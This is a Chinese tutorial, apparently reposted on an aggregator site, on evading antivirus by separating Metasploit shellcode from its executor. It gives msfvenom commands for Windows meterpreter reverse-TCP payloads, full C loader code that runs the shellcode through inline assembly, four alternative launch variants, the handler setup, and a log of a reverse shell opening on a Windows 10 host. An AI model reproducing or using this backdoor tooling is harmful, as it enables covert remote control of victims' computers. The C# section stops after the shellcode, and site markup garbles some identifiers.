大佬教程收集整理的这篇文章主要介绍了Payload 实现后门分离免杀,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。
接下来我们将使用SHellCode和执行器分离的方式来实现免杀
1.首先使用@H_879_25@msfvenom命令生成一句简短的sHellcode,这里指定连接地址为IP=192.168.1.7,PORT=8888
,当执行sHellcode生成命令时屏幕会输出一些十六进制的文本,这些文本其实是机器码的编码形式,以下是对参数的解释.
[[email protected] ~]# msfvenom -a x86 --platform Windows > -p windows/meterpreter/reverse_tcp > -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c Found 11 compatible encoders AttempTing to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of c file: 1571 bytes unsigned char buf[] = "\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1" "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c" "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04" "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93" "\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f" "\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d" "\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75" "\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9" "\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1" "\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2" "\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58" "\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d" "\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b" "\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79" "\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30" "\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d" "\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2" "\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e" "\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a" "\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b" "\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5" "\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12" "\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02" "\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46" "\xca\xec\x3f\xcd\x34\xa2\x40\xc4"; -a #指定payload目标框架 --platform #指定payload的目标平台 -p,--payload #指定需要使用的payload(攻击荷载) -f,--format #指定输出格式 (使用 --Help-formats 来@L_181_6@msf) -b '\x00\x0b' #规避特殊字符串
2.将上面的SHellCode代码复制下来,打开VS Express编译器
,并写以下C代码,这里使用内联汇编的形式调用这段SHellCode代码.
#include <stdio.h> #include <windows.h> //#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 隐藏控制台窗口显示 #pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积 #pragma comment(linker,"/section:.data,RWE") // 启用数据段可读写 unsigned char sHellcode[] = "\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1" "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c" "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04" "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93" "\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f" "\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d" "\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75" "\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9" "\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1" "\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2" "\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58" "\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d" "\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b" "\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79" "\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30" "\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d" "\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2" "\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e" "\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a" "\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b" "\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5" "\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12" "\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02" "\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46" "\xca\xec\x3f\xcd\x34\xa2\x40\xc4"; int main(int argc,char **argv) { __asm { lea eax,sHellcode call eax } return 0; }
此外出去上面的这种汇编形式,这里我也整理了其他的一些调用SHellCode的代码.
//第1种方法 void RunSHellCode_2() { ((void(*)(void))&sHellcodE)(); } //第2种方法 void RunSHellCode_3() { __asm { lea eax,sHellcode; jmp eax; } } //第3种方法 void RunSHellCode_4() { __asm { mov eax,offset sHellcode; jmp eax; } } //第4种方法 void RunSHellCode_5() { __asm { mov eax,offset sHellcode; _emit 0xFF; _emit 0xE0; } }
3.在MFS控制主机,启动侦听程序.
@H_180_30@msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lhost 192.168.1.7 lhost => 192.168.1.7 msf5 exploit(multi/handler) > set lport 8888 lport => 8888 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.7:8888启动我们的sHellcode代码,就可看到反弹回一个sHell.
@H_180_30@msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.7:8888 [*] Sending stage (179779 bytes) to 192.168.1.2 [*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805) meterpreter > sysinfo Computer : lyshark OS : Windows 10 (Build 19999). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\Windows\Microsoft.NET\Framework64目录中找到他的编译程序。为
了使用方便,你可以手动把这个目录添加到Path环境变量中去。
1.使用MSF工具生成后门SHellCode,并将这段SHellCode保存到lyshark.txt。
[[email protected] ~]# msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid > LHOST=192.168.1.30 LPORT=8080 -b '\x00' > -e x64/xor -i 10 -f csharp > -o ./lyshark.txt
[[email protected] ~]# cat lyshark.txt byte[] buf = new byte[951] { 0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97,0xb9,0xdc,0x04,0x58,0x27,0x2d,0xf8,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,0x4f,0xfb,0xfa,0x93,0x92,0x23,0x09,0x0c,0xb8,0xa5,0xb6,0x2c,0x64,0xbd,0xa6,0x4c,0x84,0xe6,0x4d,0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x79,0xf9,0x46,0xfd,0x3c,0xce,0x0a,0x9a,0x03,0xc7,0x18,0x47,0x90,0xc3,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x14,0x99,0x7d,0xbf,0xdf,0x38,0x12,0x08,0x2b,0x42,0xbc,0x98,0x2a,0xf3,0xaf,0x1f,0x67,0xf1,0x35,0x9f,0xd0,0x3f,0x13,0xa2,0xf5,0x88,0xe0,0x26,0xaa,0xb0,0x02,0xa4,0xe5,0x63,0xb1,0x8c,0x75,0xd5,0x06,0xb4,0x30,0x73,0x29,0x80,0xe3,0x0f,0x19,0xd4,0xc4,0x62,0x45,0x1a,0x22,0x5f,0x91,0x0b,0x6d,0x76,0x59,0xe8,0x8a,0xa8,0x8b,0x70,0x5a,0xd8,0xb3,0x82,0xb5,0x86,0x21,0xee,0x3a,0x3d,0xda,0xf2,0x2e,0x6a,0x54,0x5c,0x51,0x36,0xd9,0x43,0xad,0x89,0x3e,0x1c,0x95,0x0d,0x10,0x96,0xc1,0x49,0xed,0xba,0x32,0x52,0x94,0xd7,0xcf,0x65,0x24,0x85,0xab,0x69,0xfc,0xd3,0xdb,0x66,0x44,0x61,0xa1,0xa7,0x20,0xd6,0x7f,0x60,0xeb,0xcd,0x57,0xe7,0x8f,0x1d,0x39,0x6c,0x6e,0xcb,0x17,0x9c,0x9e,0x0e,0xd2,0xa0,0xde,0xd1,0xae,0xf6,0xac,0x07,0xbe,0x11,0xec,0xa3,0x72,0x33,0x87,0xc6,0x40,0x74,0x01,0xea,0x77,0x55,0xc2,0x7c,0x41,0x15,0xc0,0x6f,0x04 };
以上是大佬教程为你收集整理的Payload 实现后门分离免杀全部内容,希望文章能够帮你解决Payload 实现后门分离免杀所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。